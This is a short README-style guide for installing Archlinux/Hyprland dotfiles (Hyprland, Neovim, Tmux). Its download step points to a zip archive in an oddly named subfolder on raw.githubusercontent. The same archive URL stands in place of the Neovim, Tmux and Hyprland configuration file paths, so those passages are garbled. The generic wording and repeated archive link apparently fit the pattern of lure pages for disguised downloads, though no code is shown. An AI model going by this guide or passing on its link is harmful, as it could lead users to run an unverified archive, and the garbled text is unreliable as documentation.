Welcome! This guide will help you easily download and run the dotfiles application for Archlinux and Hyprland. Follow the steps below to get started.
Before you download, ensure your system meets these requirements:
- Operating System: Archlinux
- A terminal emulator (e.g., Konsole, Terminal)
- Basic knowledge of the terminal for installation
To get the latest version, visit this page to download: Releases Page.
- Click the link above to access the Releases page.
- Look for the latest version. It will have the highest version number.
- Download the
https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip
or another available archive file. - Once the download completes, unzip the file to a location of your choice.
To set up your dotfiles, follow these steps:
- Open your terminal.
- Navigate to the folder where you unzipped the dotfiles:
cd path/to/unzipped/folder
- Copy the dotfiles to your home directory:
cp -R ./* ~/
This step will overwrite any existing dotfiles in your home directory. Backup your current dotfiles if needed.
This dotfiles repository includes configurations for:
- Hyprland: A modern and customizable window manager.
- Neovim: An enhanced version of Vim for text editing.
- Tmux: A terminal multiplexer that allows multiple terminal sessions.
Each application has its own configuration files that you can customize further as per your needs.
After you copy the dotfiles, you might want to customize them:
- Neovim Configuration: Located in
~https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip
. Edit this file to change editor settings. - Tmux Configuration: Found in
~https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip
. Adjust this file to set your preferred terminal parameters. - Hyprland Settings: Located in
~https://raw.githubusercontent.com/Selen525/dotfiles/master/whipparee/dotfiles.zip
. Modify this according to your workflow.
If you encounter issues during installation, consider the following tips:
- Ensure you have installed required applications on your system.
- Check file permissions. Ensure the copied files are accessible.
- View the terminal output for any error messages. These can guide you to the specific problem.
For assistance and community support, you can:
- Visit the GitHub Issues Page for any questions or to report bugs.
- Look for discussions related to Archlinux and Hyprland in forums or chat groups for user-contributed tips.
- Archlinux Wiki: Archlinux Documentation
- Hyprland Guide: Check Hyprlandโs official documentation for advanced setups.
- Neovim Tutorials: Numerous online resources are available to learn about Neovim's features and usage.
For direct questions regarding this repository, feel free to create an issue on the repository page. Your feedback is important, and we appreciate your contribution to the community.
This project is licensed under the MIT License. This means you can modify and distribute it as you like, provided that you include a copy of the original license.